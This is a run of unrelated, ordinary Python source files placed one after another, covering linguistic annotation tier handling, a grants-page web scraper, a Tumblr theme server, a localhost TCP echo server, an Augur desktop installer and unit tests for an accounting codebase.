        :param str prev: Id of the previous annotation.
        :param str svg_ref: Svg reference.
        :raises KeyError: If the tier is non existent.
        """
        self.tiers[id_tier][1][self.generate_annotation_id()] =\
            (ref, value, prev, svg_ref)

    def get_ref_annotation_data_for_tier(self, id_tier):
        """"Give a list of all reference annotations of the form:
        ``[{id -> (ref, value, previous, svg_ref}]``

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        return self.tiers[id_tier][1]

    def remove_controlled_vocabulary(self, cv):
        """Remove a controlled vocabulary.

        :param str cv: Controlled vocabulary id.
        :raises KeyError: If the controlled vocabulary is non existent.
        """
        del(self.controlled_vocabularies[cv])

    def generate_annotation_id(self):
        """Generate the next annotation id, this function is mainly used
        internally.
        """
        if self.naive_gen_ann:
            new = self.last_ann+1
            self.last_ann = new
        else:
            new = 1
            anns = {int(ann[1:]) for tier in self.tiers.itervalues()
                    for ann in tier[0]}
            if len(anns) > 0:
                newann = set(xrange(1, max(anns))).difference(anns)
                if len(newann) == 0:
                    new = max(anns)+1
                    self.naive_gen_ann = True
                    self.last_ann = new
                else:
                    new = sorted(newann)[0]
        return 'a%d' % new

    def generate_ts_id(self, time=None):
        """Generate the next timeslot id, this function is mainly used
        internally

        :param int time: Initial time to assign to the timeslot
        """
        if self.naive_gen_ts:
            new = self.last_ts+1
            self.last_ts = new
        else:
            new = 1
            tss = {int(x[2:]) for x in self.timeslots}
            if len(tss) > 0:
                newts = set(xrange(1, max(tss))).difference(tss)
                if len(newts) == 0:
                    new = max(tss)+1
                    self.naive_gen_ts = True
                    self.last_ts = new
                else:
                    new = sorted(newts)[0]
        ts = 'ts%d' % new
        self.timeslots[ts] = time
        return ts

    def clean_time_slots(self):
        """Clean up all unused timeslots.
        .. warning:: This can and will take time for larger tiers. When you
                     want to do a lot of operations on a lot of tiers please
                     unset the flags for cleaning in the functions so that the
                     cleaning is only performed afterwards.
        """
        ts_in_tier = set(sum([a[0:2] for tier in self.tiers.itervalues()
                              for a in tier[0].itervalues()], ()))
        ts_avail = set(self.timeslots)
        for a in ts_in_tier.symmetric_difference(ts_avail):
            del(self.timeslots[a])
        self.naive_gen_ts = False
        self.naive_gen_ann = False

    def generate_annotation_concat(self, tiers, start, end, sep='-'):
        """Give a string of concatenated annotation values for annotations
        within a timeframe.

        :param list tiers: List of tier names.
        :param int start: Start time.
        :param int end: End time.
        :param str sep: Separator string to use.
        :returns: String containing a concatenation of annotation values.
        :raises KeyError: If a tier is non existent.
        """
        return sep.join(
            set(d[2] for t in tiers if t in self.tiers for d in
                self.get_annotation_datas_between_times(t, start, end)))

    def merge_tiers(self, tiers, tiernew=None, gaptresh=1):
        """Merge tiers into a new tier and when the gap is lower then the
        threshhold glue the annotations together.

        :param list tiers: List of tier names.
        :param str tiernew: Name for the new tier, if ``None`` the name will be
                            generated.
        :param int gapthresh: Threshhold for the gaps.
        :raises KeyError: If a tier is non existent.
        :raises TypeError: If there are no annotations within the tiers.
        """
        if tiernew is None:
            tiernew = '%s_Merged' % '_'.join(tiers)
        self.remove_tier(tiernew)
        self.add_tier(tiernew)
        timepts = sorted(set.union(
            *[set(j for j in xrange(d[0], d[1])) for d in
                [ann for tier in tiers for ann in
                 self.get_annotation_data_for_tier(tier)]]))
        if len(timepts) > 1:
            start = timepts[0]
            for i in xrange(1, len(timepts)):
                if timepts[i]-timepts[i-1] > gaptresh:
                    self.insert_annotation(
                        tiernew, start, timepts[i-1],
                        self.generate_annotation_concat(tiers, start,
                                                        timepts[i-1]))
                    start = timepts[i]
            self.insert_annotation(
                tiernew, start, timepts[i-1],
                self.generate_annotation_concat(tiers, start, timepts[i-1]))

    def shift_annotations(self, time):
        """Shift all annotations in time, this creates a new object.

        :param int time: Time shift width, negative numbers make a right shift.
        :returns: Shifted :class:`pympi.Elan.Eaf' object.
        """
        e = self.extract(
            -1*time, self.get_full_time_interval()[1]) if time < 0 else\
            self.extract(0, self.get_full_time_interval()[1]-time)
        for tier in e.tiers.itervalues():
            for ann in tier[0].itervalues():
                e.timeslots[ann[0]] = e.timeslots[ann[0]]+time
                e.timeslots[ann[1]] = e.timeslots[ann[1]]+time
        e.clean_time_slots()
        return e

    def filterAnnotations(self, tier, tier_name=None, filtin=None,
                          filtex=None):
        """Filter annotations in a tier

        :param str tier: Name of the tier:
        :param str tier_name: Name of the new tier, when ``None`` the name will
                              be generated.
        :param list filtin: List of strings to be included, if None all
                            annotations all is included.
        :param list filtex: List of strings to be excluded, if None no strings
                            are excluded.
        :raises KeyError: If the tier is non existent.
        """
        if tier_name is None:
            tier_name = '%s_filter' % tier
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        for a in [b for b in self.get_annotation_data_for_tier(tier)
                  if (filtex is None or b[2] not in filtex) and
                  (filtin is None or b[2] in filtin)]:
            self.insert_annotation(tier_name, a[0], a[1], a[2])

    def glue_annotations_in_tier(self, tier, tier_name=None, treshhold=85,
                                 filtin=None, filtex=None):
        """Glue annotatotions together in a tier.

        :param str tier: Name of the tier.
        :param str tier_name: Name of the new tier, if ``None`` the name will
                              be generated.
        :param int threshhold: Threshhold for the maximum gap to still glue.
        :param list filtin: List of strings to be included, if None all
                            annotations all is included.
        :param list filtex: List of strings to be excluded, if None no strings
                            are excluded.
        :raises KeyError: If the tier is non existent.
        """
        if tier_name is None:
            tier_name = '%s_glued' % tier
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        tier_data = sorted(self.get_annotation_data_for_tier(tier))
        tier_data = [t for t in tier_data if
                     (filtin is None or t[2] in filtin) and
                     (filtex is None or t[2] not in filtex)]
        currentAnn = None
        for i in xrange(0, len(tier_data)):
            if currentAnn is None:
                currentAnn = (tier_data[i][0], tier_data[i][1],
                              tier_data[i][2])
            elif tier_data[i][0] - currentAnn[1] < treshhold:
                currentAnn = (currentAnn[0], tier_data[i][1],
                              '%s_%s' % (currentAnn[2], tier_data[i][2]))
            else:
                self.insert_annotation(tier_name, currentAnn[0], currentAnn[1],
                                       currentAnn[2])
                currentAnn = tier_data[i]
        if currentAnn is not None:
            self.insert_annotation(tier_name, currentAnn[0],
                                   tier_data[len(tier_data)-1][1],
                                   currentAnn[2])

    def get_full_time_interval(self):
        """Give the full time interval of the file.

        :returns: Tuple of the form: ``(min_time, max_time``.
        """
        return (min(self.timeslots.itervalues()),
                max(self.timeslots.itervalues()))

    def create_gaps_and_overlaps_tier(self, tier1, tier2, tier_name=None,
                                      maxlen=-1):
        """Create a tier with the gaps and overlaps of the annotations.
        For types see :func:`get_gaps_and_overlaps_duration`

        :param str tier1: Name of the first tier.
        :param str tier2: Name of the second tier.
        :param str tier_name: Name of the new tier, if ``None`` the name will
                              be generated.
        :param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
                           no maximum will be used.
        :returns: List of gaps and overlaps of the form:
                  ``[(type, start, end)]``.
        :raises KeyError: If a tier is non existent.
        :raises IndexError: If no annotations are available in the tiers.
        """
        if tier_name is None:
            tier_name = '%s_%s_ftos' % (tier1, tier2)
        self.remove_tier(tier_name)
        self.add_tier(tier_name)
        ftos = self.get_gaps_and_overlaps_duration(tier1, tier2, maxlen)
        for fto in ftos:
            self.insert_annotation(tier_name, fto[1], fto[2], fto[0])
        return ftos

    def get_gaps_and_overlaps_duration(self, tier1, tier2, maxlen=-1,
                                       progressbar=False):
        """Give gaps and overlaps. The return types are shown in the table
        below. The string will be of the format: ``id_tiername_tiername``.

        For example when a gap occurs between tier1 and tier2 and they are
        called ``speakerA`` and ``speakerB`` the annotation value of that gap
        will be ``G12_speakerA_speakerB``.

        | The gaps and overlaps are calculated using Heldner and Edlunds
          method found in:
        | *Heldner, M., & Edlund, J. (2010). Pauses, gaps and overlaps in
         conversations. Journal of Phonetics, 38(4), 555–568.
         doi:10.1016/j.wocn.2010.08.002*

        +-----+--------------------------------------------+
        | id  | Description                                |
        +=====+============================================+
        | O12 | Overlap from tier1 to tier2                |
        +-----+--------------------------------------------+
        | O21 | Overlap from tier2 to tier1                |
        +-----+--------------------------------------------+
        | G12 | Gap from tier1 to tier2                    |
        +-----+--------------------------------------------+
        | G21 | Gap from tier2 to tier1                    |
        +-----+--------------------------------------------+
        | P1  | Pause for tier1                            |
        +-----+--------------------------------------------+
        | P2  | Pause for tier2                            |
        +-----+--------------------------------------------+
        | B12 | Within speaker overlap from tier1 to tier2 |
        +-----+--------------------------------------------+
        | B21 | Within speaker overlap from tier2 to tier1 |
        +-----+--------------------------------------------+

        :param str tier1: Name of the first tier.
        :param str tier2: Name of the second tier.
        :param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
                           no maximum will be used.
        :param bool progressbar: Flag for debugging purposes that shows the
                                 progress during the process.
        :returns: List of gaps and overlaps of the form:
                  ``[(type, start, end)]``.
        :raises KeyError: If a tier is non existent.
        :raises IndexError: If no annotations are available in the tiers.
        """
        spkr1anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
                           for a in self.tiers[tier1][0].values())
        spkr2anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
                           for a in self.tiers[tier2][0].values())
        line1 = []
        isin = lambda x, lst: False if\
            len([i for i in lst if i[0] <= x and i[1] >= x]) == 0 else True
        minmax = (min(spkr1anns[0][0], spkr2anns[0][0]),
                  max(spkr1anns[-1][1], spkr2anns[-1][1]))
        last = (1, minmax[0])
        lastP = 0
        for ts in xrange(*minmax):
            in1, in2 = isin(ts, spkr1anns), isin(ts, spkr2anns)
            if in1 and in2:      # Both speaking
                if last[0] == 'B':
                    continue
                ty = 'B'
            elif in1:            # Only 1 speaking
                if last[0] == '1':
                    continue
                ty = '1'
            elif in2:            # Only 2 speaking
                if last[0] == '2':
                    continue
                ty = '2'
            else:                # None speaking
                if last[0] == 'N':
                    continue
                ty = 'N'
            line1.append((last[0], last[1], ts))
            last = (ty, ts)
            if progressbar and int((ts*1.0/minmax[1])*100) > lastP:
                lastP = int((ts*1.0/minmax[1])*100)
                print '%d%%' % lastP
        line1.append((last[0], last[1], minmax[1]))
        ftos = []
        for i in xrange(len(line1)):
            if line1[i][0] == 'N':
                if i != 0 and i < len(line1) - 1 and\
                        line1[i-1][0] != line1[i+1][0]:
                    ftos.append(('G12_%s_%s' % (tier1, tier2)
                                if line1[i-1][0] == '1' else 'G21_%s_%s' %
                                (tier2, tier1), line1[i][1], line1[i][2]))
                else:
                    ftos.append(('P_%s' %
                                (tier1 if line1[i-1][0] == '1' else tier2),
                                line1[i][1], line1[i][2]))
            elif line1[i][0] == 'B':
                if i != 0 and i < len(line1) - 1 and\
                        line1[i-1][0] != line1[i+1][0]:
                    ftos.append(('O12_%s_%s' % ((tier1, tier2)
                                if line1[i-1][0] else 'O21_%s_%s' %
                                (tier2, tier1)), line1[i][1], line1[i][2]))
                else:
                    ftos.append(('B_%s_%s' % ((tier1, tier2)
                                if line1[i-1][0] == '1' else
                                (tier2, tier1)), line1[i][1], line1[i][2]))
        return [f for f in ftos if maxlen == -1 or abs(f[2] - f[1]) < maxlen]

    def create_controlled_vocabulary(self, cv_id, descriptions, entries,
                                     ext_ref=None):
        """Create a controlled vocabulary.
        .. warning:: This is a very raw implementation and you should check the
                     Eaf file format specification for the entries.

        :param str cv_id: Name of the controlled vocabulary.
        :param list descriptions: List of descriptions.
        :param dict entries: Entries dictionary.
        :param str ext_ref: External reference.
        """
        self.controlledvocabularies[cv_id] = (descriptions, entries, ext_ref)

    def get_tier_ids_for_linguistic_type(self, ling_type, parent=None):
        """Give a list of all tiers matching a linguistic type.

        :param str ling_type: Name of the linguistic type.
        :param str parent: Only match tiers from this parent, when ``None``
                           this option will be ignored.
        :returns: List of tiernames.
        :raises KeyError: If a tier or linguistic type is non existent.
        """
        return [t for t in self.tiers if
                self.tiers[t][2]['LINGUISTIC_TYPE_REF'] == ling_type and
                (parent is None or self.tiers[t][2]['PARENT_REF'] == parent)]

    def remove_linguistic_type(self, ling_type):
        """Remove a linguistic type.

        :param str ling_type: Name of the linguistic type.
        """
        del(self.linguistic_types[ling_type])

    def add_linguistic_type(self, lingtype, constraints=None,
                            timealignable=True, graphicreferences=False,
                            extref=None):
        """Add a linguistic type.

        :param str lingtype: Name of the linguistic type.
        :param list constraints: Constraint names.
        :param bool timealignable: Flag for time alignable.
        :param bool graphicreferences: Flag for graphic references.
        :param str extref: External reference.
        """
        self.linguistic_types[lingtype] = {
            'LINGUISTIC_TYPE_ID': lingtype,
            'TIME_ALIGNABLE': str(timealignable).lower(),
            'GRAPHIC_REFERENCES': str(graphicreferences).lower(),
            'CONSTRAINTS': constraints}
        if extref is not None:
            self.linguistic_types[lingtype]['EXT_REF'] = extref

    def get_linguistic_types(self):
        """Give a list of available linguistic types.

        :returns: List of linguistic type names.
        """
        return self.linguistic_types.keys()

import configparser

CONFIG_PATH = 'accounting.conf'


class MyConfigParser():

    def __init__(self, config_path=CONFIG_PATH):
        self.config = configparser.ConfigParser(allow_no_value=True)
        self.config.read(config_path)

    def config_section_map(self, section):
        """ returns all configuration options in 'section' in a dict with
        key: config_option and value: the read value in the file"""
        dict1 = {}
        options = self.config.options(section)
        for option in options:
            try:
                dict1[option] = self.config.get(section, option)
                if dict1[option] == -1:
                    DebugPrint("skip: %s" % option)
            except:
                dict1[option] = None
        return dict1

# getint(section, option)
# getboolean(section, option)

#!/usr/bin/env python3

import sys
import numpy as np
from spc import SPC
import matplotlib.pyplot as plt


def plot(files, fac=1.0):
    for f in files:
        if f.split('.')[-1] == 'xy':
            td = np.loadtxt(f)
            plt.plot(td[:, 0], np.log(1. / td[:, 1]) * fac, label=f)
        elif f.split('.')[-1] == 'spc':
            td = SPC(f)
            plt.plot(td.xdata, np.log(1. / np.array(td.ydata)), label=f)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    files = sys.argv[2:]
    fac = float(sys.argv[1])
    plot(files, fac)

#!/usr/bin/env python

##    tumblrserv.py implements a Tumblr (http://www.tumblr.com) markup parsing
##    engine and compatible webserver.
##
##    Version: 0.2 final
##
##    Copyright (C) 2009 Jeremy Herbert
##    Contact mailto:jeremy@jeremyherbert.net
##
##    This program is free software; you can redistribute it and/or
##    modify it under the terms of the GNU General Public License
##    as published by the Free Software Foundation; either version 2
##    of the License, or (at your option) any later version.
##    
##    This program is distributed in the hope that it will be useful,
##    but WITHOUT ANY WARRANTY; without even the implied warranty of
##    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
##    GNU General Public License for more details.
##    
##    You should have received a copy of the GNU General Public License
##    along with this program; if not, write to the Free Software
##    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 
##    02110-1301, USA.

import os, sys, ftplib, yaml, cherrypy, re, urllib2

from src.post_classes import *
from src import json
from src.constants import *
from src.support import *
from src.net import *
from src.server import *

post_types = ['Regular', 'Photo', 'Quote', 'Link', 'Conversation', 'Video', 'Audio', 'Conversation']

args_dict = {
    'autoreload': 0, # Whether to add the meta refresh tag
    'publish': False, # Whether to push the new theme data to tumblr
    'data_source': DATA_LOCAL, # Whether to use local data in the theme
}

########################################

# take the arguments and place them in a mutable list 
arguments = sys.argv

# if the script has been run with the interpreter prefix, get rid of it
if arguments[0] == 'python' or arguments[0] == 'ipython' \
or arguments[0] == 'python2.5': 
    arguments.pop(0)

# pop off the script name
arguments.pop(0)

# load the configuration file
config_path = 'data/config.yml'
if contains(arguments, '--config'):
    if os.path.exists(next_arg(arguments, '--config')):
        config_path = next_arg(arguments, '--config')

config = get_config(config_path)

# now we check if there are any data processing flags
if contains(arguments, '--pull-data'):
    # call pull_data with the argument after the flag
    pull_data( next_arg(arguments, '--pull-data') )

if contains(arguments, '--theme'):
    if not os.path.exists("themes/" + next_arg(arguments, '--theme') + '.thtml'):
        err_exit("The theme file %s.thtml does not exist in the themes\
 directory." % next_arg(arguments, '--theme'))
    config['defaults']['theme_name'] = next_arg(arguments, '--theme')

if contains(arguments, '--publish'):
    if not has_keys(config['publishing_info'], \
     ( 'url', 'username', 'password' )): 

        err_exit('The configuration file is missing some critical publishing\
 information. Please make sure you have specified your url, username and\
 password.')
 
    publish_theme(config['publishing_info']['url'],\
     config['publishing_info']['username'],\
     config['publishing_info']['password'],\
     get_markup('themes/%s.thtml' % config['defaults']['theme_name']))
    
if contains(arguments, '--do-nothing'):
    config['optimisations']['do_nothing'] = True
    
# start the server up
cherrypy.config.update('data/cherrypy.conf')
cherrypy.quickstart(TumblrServ(config), '/')
field_dict={'ROME-FIELD-01':[ 267.835895375 , -30.0608178195 , '17:51:20.6149','-30:03:38.9442' ],
            'ROME-FIELD-02':[ 269.636745458 , -27.9782661111 , '17:58:32.8189','-27:58:41.758' ],
            'ROME-FIELD-03':[ 268.000049542 , -28.8195573333 , '17:52:00.0119','-28:49:10.4064' ],
            'ROME-FIELD-04':[ 268.180171708 , -29.27851275 , '17:52:43.2412','-29:16:42.6459' ],
            'ROME-FIELD-05':[ 268.35435 , -30.2578356389 , '17:53:25.044','-30:15:28.2083' ],
            'ROME-FIELD-06':[ 268.356124833 , -29.7729819283 , '17:53:25.47','-29:46:22.7349' ],
            'ROME-FIELD-07':[ 268.529571333 , -28.6937071111 , '17:54:07.0971','-28:41:37.3456' ],
            'ROME-FIELD-08':[ 268.709737083 , -29.1867251944 , '17:54:50.3369','-29:11:12.2107' ],
            'ROME-FIELD-09':[ 268.881108542 , -29.7704673333 , '17:55:31.4661','-29:46:13.6824' ],
            'ROME-FIELD-10':[ 269.048498333 , -28.6440675 , '17:56:11.6396','-28:38:38.643' ],
            'ROME-FIELD-11':[ 269.23883225 , -29.2716684211 , '17:56:57.3197','-29:16:18.0063' ],
            'ROME-FIELD-12':[ 269.39478875 , -30.0992361667 , '17:57:34.7493','-30:05:57.2502' ],
            'ROME-FIELD-13':[ 269.563719375 , -28.4422328996 , '17:58:15.2927','-28:26:32.0384' ],
            'ROME-FIELD-14':[ 269.758843 , -29.1796030365 , '17:59:02.1223','-29:10:46.5709' ],
            'ROME-FIELD-15':[ 269.78359875 , -29.63940425 , '17:59:08.0637','-29:38:21.8553' ],
            'ROME-FIELD-16':[ 270.074981708 , -28.5375585833 , '18:00:17.9956','-28:32:15.2109' ],
            'ROME-FIELD-17':[ 270.81 , -28.0978333333 , '18:03:14.4','-28:05:52.2' ],
            'ROME-FIELD-18':[ 270.290886667 , -27.9986032778 , '18:01:09.8128','-27:59:54.9718' ],
            'ROME-FIELD-19':[ 270.312763708 , -29.0084241944 , '18:01:15.0633','-29:00:30.3271' ],
            'ROME-FIELD-20':[ 270.83674125 , -28.8431573889 , '18:03:20.8179','-28:50:35.3666' ]}

# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from kgrants.items import KgrantsItem
from scrapy.http import Request
import time



class GrantsSpider(Spider):
    name = "grants"
    allowed_domains = ["www.knightfoundation.org"]
    pages = 1
    base_url = 'http://www.knightfoundation.org'
    start_url_str = 'http://www.knightfoundation.org/grants/?sort=title&page=%s'



    def __init__(self, pages=None, *args, **kwargs):
        super(GrantsSpider, self).__init__(*args, **kwargs)

        if pages is not None:
            self.pages = pages
            self.start_urls = [ self.start_url_str % str(page) for page in xrange(1,int(self.pages)+1)]





    def parse(self, response):

        hxs = Selector(response)
        projects = hxs.xpath('//article')

        for project in projects:
            time.sleep(2)
            project_url = self.base_url + ''.join(project.xpath('a/@href').extract())
            grants = KgrantsItem()
            grants['page'] = project_url
            grants['project'] = ''.join(project.xpath('a/div/header/h1/text()').extract()).strip()
            grants['description'] = ''.join(project.xpath('p/text()').extract()).strip()
            yield Request(grants['page'],
                          callback = self.parse_project,
                          meta={'grants':grants})


    def parse_project(self,response):

        hxs = Selector(response)
        grants = response.meta['grants']
        details = hxs.xpath('//section[@id="grant_info"]')
        fields = hxs.xpath('//dt')
        values = hxs.xpath('//dd')
        self.log('field: <%s>' % fields.extract())

        for item in details:
            grants['fiscal_agent'] = ''.join(item.xpath('header/h2/text()').extract()).strip()
            count = 0
            for field in fields:
                normalized_field = ''.join(field.xpath('text()').extract()).strip().lower().replace(' ','_')
                self.log('field: <%s>' % normalized_field)
                try:
                    grants[normalized_field] = values.xpath('text()').extract()[count]
                except:
                    if normalized_field == 'community':
                        grants[normalized_field] = values.xpath('a/text()').extract()[1]
                    elif normalized_field == 'focus_area':
                        grants[normalized_field] = values.xpath('a/text()').extract()[0]

                count += 1
            grants['grantee_contact_email'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/@href').extract()).replace('mailto:','').strip()
            grants['grantee_contact_name'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/text()').extract()).strip()
            grants['grantee_contact_location'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="location"]/text()').extract()).strip()
            grants['grantee_contact_facebook'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="facebook"]/a/@href').extract()).strip()
            grants['grantee_contact_twitter'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="twitter"]/a/@href').extract()
            grants['grantee_contact_website'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="website"]/a/@href').extract()
            if 'grant_period' in grants:
                grant_period = grants['grant_period'].split(' to ')
                grants['grant_period_start'] = grant_period[0]
                grants['grant_period_end'] = grant_period[1]

            yield grants


from sys import argv

script, input_file = argv

def print_all(f):
    print f.read()

def rewind(f):
    f.seek(0)

def print_a_line(line_count, f):
    print line_count, f.readline()

current_file = open(input_file)

print "First let's print the whole file:\n"

print_all(current_file)

print "Now let's rewind, kind of like a tape."

rewind(current_file)

print "Let's print three lines:"

current_line = 1
print_a_line(current_line, current_file)

current_line = current_line + 1
print_a_line(current_line, current_file)

current_line = current_line + 1
print_a_line(current_line, current_file)



# -*- coding: UTF-8 -*-
#/*
# *      Copyright (C) 2011 Ivo Brhel
# *
# *
# *  This Program is free software; you can redistribute it and/or modify
# *  it under the terms of the GNU General Public License as published by
# *  the Free Software Foundation; either version 2, or (at your option)
# *  any later version.
# *
# *  This Program is distributed in the hope that it will be useful,
# *  but WITHOUT ANY WARRANTY; without even the implied warranty of
# *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# *  GNU General Public License for more details.
# *
# *  You should have received a copy of the GNU General Public License
# *  along with this program; see the file COPYING.  If not, write to
# *  the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# *  http://www.gnu.org/copyleft/gpl.html
# *
# */

import re,os,urllib,urllib2,cookielib
import util,resolver

from provider import ContentProvider

class HejbejseContentProvider(ContentProvider):
	
	def __init__(self,username=None,password=None,filter=None):
		ContentProvider.__init__(self,'hejbejse.tv','http://www.kynychova-tv.cz/',username,password,filter)
		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
		urllib2.install_opener(opener)

	def capabilities(self):
		return ['resolve','categories','list']
		
	def categories(self):
		page = util.parse_html('http://www.kynychova-tv.cz/index.php?id=5')
		result = []
		for title,uri in [(x.h3.text,x.h3.a['href']) for x in page.select('div.entry5') if x.h3]:
			item = self.dir_item()
			item['title'] = title
			item['url'] = uri
			result.append(item)
		return result

	def list(self, url):
		url = self._url(url)
		page = util.parse_html(url)
		result = []
		for title,uri in [(x.img['title'],x['href']) for x in page.select('div.entry3')[0].findAll('a')]:
			item = self.video_item()
			item['title'] = title
			item['url'] = uri
			result.append(item)
		return result
	
	def resolve(self,item,captcha_cb=None,select_cb=None):
		item = item.copy()
		url = self._url(item['url'])
		page = util.parse_html(url)
		result = []
		data=str(page.select('div.entry3 > center')[0])
		resolved = resolver.findstreams(data,['<iframe(.+?)src=[\"\'](?P<url>.+?)[\'\"]'])
		try:
			for i in resolved:
				item = self.video_item()
				item['title'] = i['name']
				item['url'] = i['url']
				item['quality'] = i['quality']
				item['surl'] = i['surl']
				result.append(item)	 
		except:
			print '===Unknown resolver==='
			
		if len(result)==1:
			return result[0]
		elif len(result) > 1 and select_cb:
			return select_cb(result)

import socket
import threading
import time

def tcplink(sock, addr):
    print 'Accept new connection from %s:%s...' % addr
    sock.send('Welcome!')
    while True:
        data = sock.recv(1024)
        time.sleep(1)
        if data == 'exit' or not data:
            break
        sock.send('Hello, %s!' % data)
    sock.close()
    print 'Connection from %s:%s closed.' % addr


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 8888))
s.listen(5)
print 'Waiting for connection...'
while True:
    sock, addr = s.accept()
    t = threading.Thread(target=tcplink, args=(sock, addr))
    t.start()



import os
import sys
import shutil
import binascii
import traceback
import subprocess
from win32com.client import Dispatch

LAUNCHER_PATH = "C:\\Program Files\\Augur"
DATA_PATH = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', "Augur")
PASSFILE = os.path.join(DATA_PATH, "password.txt")

if getattr(sys, 'frozen', False):
    # we are running in a |PyInstaller| bundle
    BASEDIR = sys._MEIPASS
else:
    # we are running in a normal Python environment
    BASEDIR = os.path.dirname(os.path.abspath(__file__))

GETH_EXE = os.path.join(BASEDIR, 'geth.exe')
LAUNCHER_EXE = os.path.join(BASEDIR, 'augurlauncher.exe')

def main():
    # first make all the appropriate directories
    print("Making directories...")
    for d in LAUNCHER_PATH, DATA_PATH:
        print("Creating", d, end=" ", flush=True)
        os.mkdir(d)
        print("Success!")

    print("Generating random password file...", end=" ", flush=True)
    # then generate the password
    password = binascii.b2a_hex(os.urandom(32))
    passfile = open(PASSFILE, "w")
    passfile.write(password.decode('ascii'))
    passfile.close()
    print("Success!")

    # Then copy ".exe"s to the launcher path
    exes = GETH_EXE, LAUNCHER_EXE
    results = []
    for exe in exes:
        print("Copying", os.path.basename(exe), "to", LAUNCHER_PATH, "...", end=" ", flush=True)
        results.append(shutil.copy(exe, LAUNCHER_PATH))
        print("Sucess!")

    print("Creating node account...", end=" ", flush=True)
    # create account on node
    p = subprocess.Popen([results[0],
                      "--password", PASSFILE,
                      "account", "new"])
    p.wait()
    print("Success!")

    print("Creating shortcut...", end=" ", flush=True)
    desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
    shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
    wDir = LAUNCHER_PATH

    shell = Dispatch('WScript.Shell')
    shortcut = shell.CreateShortCut(shortcut_path)
    shortcut.Targetpath = results[1]
    shortcut.WorkingDirectory = wDir
    shortcut.IconLocation = results[1]
    shortcut.save()
    print("Success!")

def uninstall():
    paths = LAUNCHER_PATH, DATA_PATH
    for p in paths:
        print("Deleting", p, "...", end=" ", flush=True)
        shutil.rmtree(p)
        print("Success!")
    print("Removing desktop shortcut...", end=" ", flush=True)
    desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
    shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
    os.remove(shortcut_path)
    print("Success!")

if __name__ == '__main__':
    try:
        if len(sys.argv) == 2 and sys.argv[1] == 'uninstall':
            uninstall()
        elif len(sys.argv) == 1:
            main()
        else:
            assert len(sys.argv) <= 2, "wrong number of arguements!"
    except Exception as exc:
        traceback.print_exc()
    finally:
        os.system("pause")
        sys.exit(0)

import unittest
from libs.funcs import *

class TestFuncs(unittest.TestCase):

    def test_buildPaths(self):

        recPaths, repPaths, rouPaths, corePaths = buildPaths()
        findTxt = lambda x, y: x.find(y) > -1

        assert findTxt(recPaths["Task"][0], "base")
        assert findTxt(recPaths["Department"][0], "StdPy")
        assert findTxt(recPaths["Department"][1], "standard")

        assert findTxt(repPaths["ListWindowReport"][0], "base")
        assert findTxt(repPaths["ExpensesList"][0], "StdPy")
        assert findTxt(repPaths["ExpensesList"][1], "standard")

        assert findTxt(rouPaths["GenNLT"][0], "StdPy")
        assert findTxt(rouPaths["GenNLT"][1], "standard")
        assert findTxt(corePaths["Field"][0], "embedded")

        self.assertFalse([k for (k, v) in rouPaths.iteritems() if findTxt(v[0], "base")]) #no routines in base

    def test_recordInheritance(self):
        recf, recd = getRecordInheritance("Invoice")
        assert all([f1 in recf for f1 in ("SalesMan", "InvoiceDate", "CustCode", "Currency", "ShiftDate", "OriginNr", "SerNr", "attachFlag")])
        assert all([d in recd for d in ("CompoundItemCosts", "Payments", "Items", "Taxes", "Installs")])

        recf, recd = getRecordInheritance("AccessGroup")
        assert all([f2 in recf for f2 in ("PurchaseItemsAccessType", "InitialModule", "Closed", "internalId")])
        assert all([d in recd for d in ("PurchaseItems", "Customs", "Modules")])

    def test_recordsInfo(self):
        recf, recd = getRecordsInfo("Department", RECORD)
        assert recf["Department"]["AutoCashCancel"] == "integer" #From StdPy
        assert recf["Department"]["DeptName"]       == "string" #From standard
        assert recf["Department"]["Closed"]         == "Boolean" #From Master
        assert recf["Department"]["internalId"]     == "internalid" #From Record
        assert recd["Department"]["OfficePayModes"] == "DepartmentOfficePayModeRow" #Recordname from detail

        repf, repd = getRecordsInfo("Balance", REPORT)
        assert repf["Balance"]["LabelType"]         == "string" #StdPy
        assert repf["Balance"]["ExplodeByLabel"]    == "boolean" #Standard
        assert repf["Balance"]["internalId"]        == "internalid" #Record
        assert not repd["Balance"] #Empty dict, no detail

        rouf, roud = getRecordsInfo("GenNLT", ROUTINE)
        assert rouf["GenNLT"]["ExcludeInvalid"]     == "boolean"
        assert rouf["GenNLT"]["Table"]              == "string"
        assert not roud["GenNLT"]

        rouf, roud = getRecordsInfo("LoginDialog", RECORD)
        assert rouf["LoginDialog"]["Password"]      == "string" #embedded
        assert not roud["LoginDialog"]

    def test_classInfo(self):
        attr, meth = getClassInfo("Invoice")
        assert attr["DEBITNOTE"]     == 2
        assert attr["ATTACH_NOTE"]   == 3
        assert attr["rowNr"]         == 0
        assert attr["ParentInvoice"] == "SuperClass"
        assert isinstance(attr["DocTypes"], list)
        assert isinstance(attr["Origin"], dict)
